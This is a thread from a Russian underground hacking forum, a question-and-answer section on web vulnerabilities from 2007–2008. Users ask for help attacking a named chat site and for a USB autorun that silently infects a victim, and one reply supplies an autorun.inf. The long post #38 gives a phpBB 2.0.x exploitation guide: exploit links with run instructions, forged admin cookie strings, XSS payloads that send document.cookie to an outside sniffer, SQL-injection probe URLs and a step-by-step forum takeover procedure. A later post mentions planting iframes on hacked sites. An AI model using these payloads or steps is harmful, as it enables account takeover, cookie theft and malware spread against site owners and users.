Вернуться   GraBBerZ.CoM - ICQ | Proxy | Бруты | Дедики | Эксплоиты > Underground > ][ack

Ответ
 
Опции темы Опции просмотра

[Web-Уязвимости] Вопрос - ответ
Старый 13.05.2007, 13:34   #1
 
Аватар для d0p3_sh0w
 
d0p3_sh0w вне форума
Регистрация: 09.05.2007
Сообщений: 45
Респекты: 25

[Web-Уязвимости] Вопрос - ответ

В этой теме вы можете задавать любые вопросы по уязвимостям. Если вы нашли где то уязвимость, и не можете ей воспользоваться - вам сюда. По мере возможностей всё будет объяснено/описано.

Запрещается:
-Просьбы в о взломе (Я могу только помочь раскрутить уязвимость, дальше уже сами)
-Сторонние вопросы (уязвимости сторонних протоколов: ICQ, IRC, WAP etc ; вопросы связанные с ОС и серверами)

Запомните, здесь только web!

Любой оффтоп будет удаляться.

UPD. Размещение ссылок на ресурсы ЗАПРЕЩЕНО, в случае нарушения сообщение будет немедленно удаляться. (с) cat1vo
  Ответить с цитированием

ВОпрос ???
Старый 07.01.2008, 13:50   #31
Гость
 
Аватар для TERROR777
 
Сообщений: n/a
ВОпрос ???

Всем привет вопрос в поиске уязвимости В сайте chat.intersat.ru хочу наказать модеров и админов !!!!! Помогите пожалуста подскажите wwwhack не робит !!!
  Ответить с цитированием

Старый 07.01.2008, 15:03   #32
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
Цитата:
Сообщение от TERROR777 Посмотреть сообщение
wwwhack не робит !!!
ухахаха ,посмотрим позже что там.
__________________
  Ответить с цитированием

Старый 26.02.2008, 13:59   #33
megabyte
 
Аватар для INSIDER
 
INSIDER вне форума
Регистрация: 10.02.2008
Адрес: СПб
Сообщений: 211
Респекты: 174
Вот у меня вопрос (заранее предупреждаю злостных админов я просто не знаю куда эту тему впихнуть, так что если не нравиться просто удалите её, но не давайте мне банан плизз)

итак: возможно ли сделать автозапуск содержимого флешки т.е допустим на флешки есть вирь можно ли сделать так, что стоит жертве только вставить флешку в USB гнездо, как вирус пойдёт на исполнение ???

слышал про файлы autorun.inf, помогут ли они? и если да то напишите пожалуйсто текст этого файла! А вообще слушаю все предложения хе-хе


зыы : не надо писать типо "А зачем тебе это, а почему ?" только если можно по делу!

ПРИМНОГО БЛАГОДАРЕН
  Ответить с цитированием

Старый 26.02.2008, 14:56   #34
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
autorun.inf
Цитата:
[autorun]
ICON=file.ico
OPEN=autorun.exe
__________________
  Ответить с цитированием

Старый 26.02.2008, 15:10   #35
megabyte
 
Аватар для skart
 
skart вне форума
Регистрация: 17.01.2007
Сообщений: 312
Респекты: 335
titan_2008,
  Ответить с цитированием

Старый 26.02.2008, 15:15   #36
megabyte
 
Аватар для INSIDER
 
INSIDER вне форума
Регистрация: 10.02.2008
Адрес: СПб
Сообщений: 211
Респекты: 174
Цитата:
Сообщение от b3 Посмотреть сообщение
autorun.inf

Цитата:


[autorun]
ICON=file.ico
OPEN=autorun.exe
ага спасибо ! я пробывал это - не помогло, ну фиг с ним, допустим это сработало, но ведь вирус сразу не запуститься , а откроеться виндовский диалог о том что надо сделать. ну там запустить, октрыть, закрыть и т.д. А мне надо шоб сразу хе-хе
  Ответить с цитированием

Старый 03.03.2008, 01:29   #37
megabyte
 
Аватар для 4NT1P0V
 
4NT1P0V вне форума
Регистрация: 15.01.2008
Адрес: Российская Федерация
Сообщений: 300
Респекты: 168
Подскажите хорошую статью по уязвимостям форума phpBB.. Заранее спасибо.
  Ответить с цитированием

Старый 03.03.2008, 02:25   #38
l
e
m
 
Аватар для flem
 
flem вне форума
Регистрация: 06.10.2006
Сообщений: 2,344
Респекты: 3,820
phpBB <= 2.0.4
Цель: просмотр содержимого файлов на сервере
Описание: Была выпущена в 2002. Данная версия почти не присутствует в сети.
Описание уязвимости: Некорректная обработка входных параметров в Admin_Styles.PHP.
Exploit: http://milw0rm.com/id.php?id=47

phpBB <= 2.0.5
Цель: просмотр hash'a пароля
Описание: Выпущена в 2002. Также редкая версия.
Описание уязвимости: Возможность создания специального SQL запроса, уязвимость существует в при обработке $topic_id. Возможно добавить 2 запрос, тем самым захватить хэш.
Exploit: http://milw0rm.com/id.php?id=44
При запуске $remote = shift || 'localhost'; - изменяем на нужный например 255.255.255.255, $uid = shift || 2; - ID нужного нам пользователя. В форумах phpBB ID администратора по умолчанию "2". Затем пишем "perl exp.pl"
Video: -

phpBB <= 2.0.6
Цель: просмотр hash'a пароля
Описание: Выпущена в 2002. Также редкая версия.
Описание уязвимости: Возможность создания специального SQL запроса, уязвимость существует в модуле search.php.
Exploit: http://milw0rm.com/id.php?id=137
Запускаем "perl exp.pl <server> <folder> <user_id> <search_id>"
Где <server> - ip сервера (ip сервера можно узнать так Пуск->Выполнить-> набрать cmd, затем в появивешмся окне набрать "ping test.com"), <folder> - папка где находится сам форум (например если у нас http://123.123.123.123/forum/index.php, вместо <folder> пишем forum), <user_id> <search_id> - ID пользователя.
Video: http://video.antichat.net/videos/kez/phpbb_206_sql2.rar

phpBB <= 2.0.8
Цель: подмена ip
Описание: так себе
Описание уязвимости: позволяет подменить ip отправителя на произвольный
Exploit: http://securityvulns.ru/Gdocument110.html

phpBB 2.0.10
Пропустим версии с 7 по 9, т.к. в них присутствует те же уязвимости, что и в phpBB 2.0.10.
Цель: (1) Выполение произвольных команд.
Описание: Была выпущена так же в 2002. Данная версия встречается намного чаще, чем младшие. Но реже чем старшие =). Был произведён дефейс сайта phpbb.com, с помощью найденной уязвимости в этой версии.
Описание уязвимости: Некорректная обработка входных параметров в viewtopic.php.
Exploit: http://milw0rm.com/id.php?id=647 Запускать "perl exp.pl [*URL] [DIR] [NUM] [CMD]"
Где [*URL] - урл сайта (например http://www.test.com), [DIR] - директория в которой находится форум(например /forum/ или /forum), [NUM] - номер топика (обязательно существующего), [CMD] - команда которую следует выполнить (например ls -la, справочник всех команд *nix http://forum.antichat.ru/threadnav7345-1-10.html)
video: -

Цель: (2) Попадание в админку обходя ограничения.
Описание: -
Описание уязвимости: Некорректная обработка входных параметров в Admin_Styles.PHP.
Exploit: В архиве с видео =)
Video: http://video.antichat.net/videos/wizi/vhackbbshwizi.rar

phpBB <= 2.0.11
Цель: Выполение произвольных команд
Описание: Была выпущена так же в 2002.
Описание уязвимости: Некорректная обработка входных параметров в viewtopic.php - горе-кодеры плохо запатчили предыдущую багу - фильтрация ковычки обходится как %2527
Exploit: http://www.site.ru/forum/viewtopic.php?t=2726&highlight=%2527.$poster=%60$v ar%60.%2527&var=id

phpBB <= 2.0.12
Цель: Вход на форум аккаунтом администратора.
Описание: -
Описание уязвимости: Для начала нам следует зарегаться на форуме. Затем, войти под своим аккаунтом и если стоит галка "Автоматический вход",то убрать её. Нам нужно отредактировать кукисы (посоветую делать это в опере Tools->Advanced->Cookies),
вместо
Цитата:a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3 A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7 D

X - наш ID ,
а меняем на
Цитата:a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3 A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

2 - как уже говорилось выше, ID админа
Exploit: "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs % 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"
Video: -

phpBB <= 2.0.13
Цель: просмотр hash'a пароля, любого пользователя
Описание: -
Описание уязвимости: Уязвимость присутствует в модуле downloads.php. Есть возможность SQL инъекции
Exploit: http://milw0rm.com/id.php?id=907
Запускать "perl exp.pl <site> <dir> <id>"
Где <site> URL сайта <dir> - директория <id> - нужный нам пользователь
Video: -

phpBB <= 2.0.15
Цель: получение Имя,Логина, Пароля от БД.
Описание: -
Описание уязвимости: Уязвимость пристутствует в модуле viewtopic.php.
Exploit: http://milw0rm.com/id.php?id=1080 Запускать "perl exp.pl <server> <dir> <id> \r\n"
Где <server> - ip сервера, <dir> - директория в которой находится форум <id> номер существующего топика.
Video: -

phpBB <= 2.0.16
Цель: получение hash'a пароля пользователя
Описание: -
Описание уязвимости: В данной версии присутствует XSS (Cross Site Scripting более подробно про XSS можно почитать тут http://antichat.ru/txt/xssoverview/ или http://ha.ckers.org/xss.html), которая получить кукисы. Они высылаются на сниффер,
логи которого можно посмотреть здесь http://antichat.ru/sniff/log.php.
Exploit:
Код:
[*color=#EFEFEF][*url]www.ut[*url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

Video: -

phpBB <= 2.0.16
Цель: 2.0.16 Installation Path Disclosure
Описание: -
Описание уязвимости: раскрытие данных
Exploit: http://someshit.net/showthread.php?t=71
Video: -

phpBB <= 2.0.17
Цель: выполнение произвольных команд на сервере(php-inj)
Описание: -
Описание уязвимости: В данной версии присутствует уязвимость в модуле profile.php.
Exploit: http://rst.void.ru/download/r57phpbb2017.txt Запускать "perl exp.pl <URL> <cmd>"
Где <URL> - ссылка до форума например http://site.com/phpBB/, <cmd> - нужная команда (о командах читаем тут http://forum.antichat.ru/threadnav7345-1-10.html).
Video: -

phpbb <= 2.0.18
Цель: получение сессии админа
Описание: XSS в собщении
Описание уязвимости: требует включеных BB-тэгов или HTML на форуме
Exploit:
Код:
<B C=">" onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" X="<B "> H A L L O </B>

Код:
<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='fon t-size:0; X="<B ">'</B>

PHP код:
http://www.<a href="https://anonym.t...follow">wj</a>


phpBB <= 2.0.18
Цель: получение hash'a пароля пользователя
Описание: найдена WJ (White Jordan =)
Описание уязвимости: В данной версии присутствует XSS.
Exploit:
Код:
[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;& +#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99 ;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;& +#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#1 05;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;& +#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104; &+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#11 0;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+ #114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98; &+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+# 103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL]

Что бы воспользоваться сплойтом убираем плюсы между символами & и #(например было "&+#40" стало -"&#40")
Video: -

phpBB <= 2.0.18
Цель: подмена ника
Описание: найдена Dgoing
Описание уязвимости: подмена ника, обход бана
Exploit: http://forum.antichat.ru/thread19817.html
Video: -

phpbb <= 2.0.19
Цель: получение сессии админа
Описание: XSS в собщении
Описание уязвимости: требует включеных BB-тэгов или HTML на форуме
Exploit:
Код:
<B C='>' onmouseover='alert(document.location="http://antichat.ru"+document.cookie)' X='<B '> antichat.ru </B>

PHP код:
http://www.wj


phpbb <= 2.0.19
Цель: получение пароля админа
Описание: phpBB Style Changer\Viewer MOD SQL injection Exploit
Описание уязвимости: sql-inj уязвимость в index.php?s=[SQL] позволяет выполнить произвольный запрос в бд
Exploit: http://milw0rm.com/exploits/1469

phpbb = 2.0.19
Цель: DoS форума
Описание: -
Описание уязвимости: Уязвимость позволяет забанить всех пользователей на форуме
Exploit: http://forum.comp-info.ru/showthread.php?threadid=238

phpbb <= 2.0.19
Цель: DoS форума
Описание: Neo Security Team (автор - HaCkZaTaN)
Описание уязвимости: Сплоит регистрирует неограниченное количество ников или делает через поиск запросы, которые база не может воспринять. Сплойт бессилен там, где надо вводить код (визуальное подтверждение) при регистрации
Exploit: http://www.h4cky0u.org/advisories/HY...-001-phpbb.txt

phpbb <= 2.0.19
Цель: получение пароля админа
Описание: Уязвимость позволяет удаленному пользователю произвести брут-форс атаку.
Описание уязвимости: Уязвимость существует из-за того, что функция "gen_rand_string()" генерирует угадываемые случайные номера. Удаленный пользователь может изменить пароль к целевой учетной записи с помощью функционала восстановления пароля путем отправки большого количества запросов для подбора Validation ID (не более 1000000 запросов). Для удачной эксплуатации уязвимости злоумышленнику необходимо знать e-mail целевой учетной записи.
Exploit: http://milw0rm.com/exploits/1382

phpbb <= 2.0.20
Цель: DoS форума
Описание: банит все аккаунты
Описание уязвимости: по умолчанию в форуме включен бан аккаунта при более 5 неудачных попыток входа
Exploit: phpBB 2.0.20 Disable Admin or User Account
Video: -

phpBB <= 2.0.21
Цель: компрометация сервера
Описание: obviously you have no output, but this makes phpbb to be like a http proxy
Описание уязвимости: а в переводе - phpbb можно использовать как прокси, посылая запрос в удаленном урле аватара; также форум не проверяет контент загружаемых аватарах в EXIF тэгах, туда мона поместить PHP-код и потом какнить приинклудить. Вот.
Exploit: http://www.securityfocus.com/archive/1/433858

phpBB <= 2.0.21
Цель: получение сессии админа
Описание: XSS нападение и CSRF атака
Описание уязвимости: 1)Уязвимость существует из-за того, что приложение не проверяет валидность HTTP запроса при отправке сообщений. 2) Уязвимость существует из-за недостаточной обработки входных данных в поле "Message body" в сценарии privmsg.php.
Exploit: http://www.securitylab.ru/vulnerability/281494.php

Добавлено через 1 минуту
1) Хочу понять, как же взламываются форумы phpbb.
Их можно взломать 5 способами:
1) Через уязвимость highlight. Дает исполнение команд на сервере. Подробно о баге можно почитать в разделе "Заливка шелла в phpbb"
2) Получить доступ к аккаунту администратора.
3) Через уязвимость в профайле signature_bbcode_uid Подробно о баге можно почитать в разделе "Заливка шелла в phpbb"
4) Взлом через моды.
5) Взлом через sql инъекцию.

2) Как получить аккаунт администратора на форуме?
1) Угадать, украсть, спросить.
2) XSS - позволяет украсть куки администратора и под ним зайти на форум. В версиях >2.0.19 нельзя войти в админку незная пароля.
xss для форума phpbb. Почти все найдены White Jordan.

[c*olor*=#EFE*FEF][forbidden link][/UR*L]


phpbb 2.0.17 Рушиться структура, код надо доработать
[im*g]http://ww*w.phpbb.com/xx[em*ail]xx@*xx.com[/ema*il]images/p*hplogo.gif[/i*mg]

[*url]ww*w.ut[forbidden link][/u*rl]'

[*url=http://www.%*5burl=http://xx.com/style=display:no*ne;backgrou*nd#58;url(javascript: alert()&+#41; %5*dxx*]http://www.<a href="http://xx.com/style=displa...) " target="_*blank*">xx[/url]

пихаем все эти коды в сообщение, на сниффере ловим куки, подставляем их, и мы админы.

3) Получение админского аккаунта через багу в куках.
phpbbmysql_data:a%3A2%3A%7Bs%3A11%3A%22autologinid %22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222% 22%3B%7D

И мы становимся админом (если форум не пропатчен).

3) Как происходит взлом?
1) Просмотр версии форума. Она определяется заходом по ссылке http://site.ru/forum/docs/CHANGELOG.html
Смотрим какая там последняя версия и прибавляем единицу.
2) Проверку на уязвимость форума к багам highlight, админским кукам, signature_bbcode_uid.
Если сработало, иди в раздел "Заливка шелла в phpbb". Если не сработало.
3) Проверяем форум на sql уязвимости.
Делаем запросы:
http://site.ru/forum/viewtopic.php?sid=1&topic_id=-1'
http://site.ru/forum/search.php?search_id=-1'
http://site.ru/forum/search.php?search_results=-1'
Если сработало, то добываем хеш админа, расшифровываем.
4) Если ничего не помогло, теперь надо проверить форум на дырки в модах.
запросы:
http://site.ru/forum/language/lang_e...g_activity.php include
http://site.ru/forum/admin/addentry.php include
http://site.ru/forum/m2f/m2f_phpbb204.php include
http://site.ru/forum/admin/admin_top...on_logging.php include
http://site.ru/forum/cal_view_month.php sql
http://site.ru/forum/auction_offer_view.php sql
http://site.ru/forum/downloads.php sql
http://site.ru/forum/alltopics.php sql
http://site.ru/forum/admin/admin_cash.php include
http://site.ru/forum/toplist.php sql
http://site.ru/forum/index.php?s=-1' sql
http://site.ru/forum/index.php?style=-1' sql
Запросы для получение привилегий найдете на секьюрити порталах.
5) Взлом через xss.

4) Как узнать серверный путь форума?
http://site.ru/forum/admin/admin_dis...?setmodules=00 до 2.0.19
http://site.ru/forum/profile.php?mode[]=
http://site.ru/forum/posting.php?mode[]=
http://site.ru/forum/groupcp.php?mode[]=
http://site.ru/forum/modcp.php?mode[]=
http://site.ru/forum/privmsg.php?folder[]=
http://site.ru/forum/db/oracle.php
http://site.ru/forum/memberlist.php?mode[]=cx + дает возможно узнать префикс таблиц базы данных

Пути для форумов <2.0.10
http://site.ru/forum/index.php?category_rows=aaaa
http://site.ru/forum/faq.php?faq=aaaa
http://site.ru/forum/profile.php?mod...&ranksrow=aaaa

5) Как узнать префикс таблиц базы данных?
http://site.ru/forum/memberlist.php?mode[]=cx
http://site.ru/forum/modcp.php?t=-456

подробно о каждой баге можете почитать здесь
http://forum.antichat.ru/thread24488.html
  Ответить с цитированием
Юзеру flem выразили Респект за этот пост:

Старый 03.03.2008, 11:57   #39
megabyte
 
Аватар для 4NT1P0V
 
4NT1P0V вне форума
Регистрация: 15.01.2008
Адрес: Российская Федерация
Сообщений: 300
Респекты: 168
Статья конечно хорошая, но вот как все это примерить? есть хотя бы одно видео по загрузке Exploit ?? чтоб примерно знать что и куда....
  Ответить с цитированием

Старый 03.03.2008, 14:45   #40
megabyte
 
Аватар для _NuClear
 
_NuClear вне форума
Регистрация: 13.12.2006
Адрес: grabberz.com
Сообщений: 223
Респекты: 42
Для загрузки сплоитов нужно сначала взломать сайт, поставить фрейм ведущий на твой сайт с ротатором, для начала почитай статьи об Метасплоит фреймфорк. В нас на форуме раздел статьи
  Ответить с цитированием

Старый 03.03.2008, 15:14   #41
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
_NuClear,
шо за бред...

Цитата:
Сообщение от 4NT1P0V Посмотреть сообщение
но вот как все это примерить?
Самый простой способ для таких как ты, что б нифига обсолютно не делать:
1. _http://milw0rm.com/search.php
и тут вводиш phpBB, далее качаеш Active Perl его ищи сам. и все сплойты что найдет Милв0рм суёш в perl.
Как установить perl, как запускать сплойты, где скачать perl и тд. можно найти при помощи поиска.
__________________
  Ответить с цитированием

Старый 03.03.2008, 17:43   #42
megabyte
 
Аватар для _NuClear
 
_NuClear вне форума
Регистрация: 13.12.2006
Адрес: grabberz.com
Сообщений: 223
Респекты: 42
Я про загрузку вирей на комп пользователей, использование связок, сори что то тему плохо прочитал, но статьи о метасплоите почитать не помешает.
  Ответить с цитированием

Старый 06.03.2008, 10:45   #43
::GraBBerZ.CoM::
 
Аватар для Freelancer
 
Freelancer вне форума
Регистрация: 31.01.2007
Адрес: Москва
Сообщений: 507
Респекты: 855
Помогите, кто может, как можно определить версию движка форума?
  Ответить с цитированием

Старый 06.03.2008, 11:06   #44
GraBBerZ.CoM
 
Аватар для GaM
 
GaM вне форума
Регистрация: 04.12.2006
Сообщений: 286
Респекты: 345
Freelancer, может ссылочку дашь?!
  Ответить с цитированием

Старый 06.03.2008, 11:22   #45
::GraBBerZ.CoM::
 
Аватар для Freelancer
 
Freelancer вне форума
Регистрация: 31.01.2007
Адрес: Москва
Сообщений: 507
Респекты: 855
например, _http://torrents.ru/forum
  Ответить с цитированием
Ответ

Метки
csrf, faq, hackbar, sql, sql injection, xss, вопрос-ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход



Время: 17:03



Powered by vBulletin® Version 3.7.6
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd. Перевод: zCarot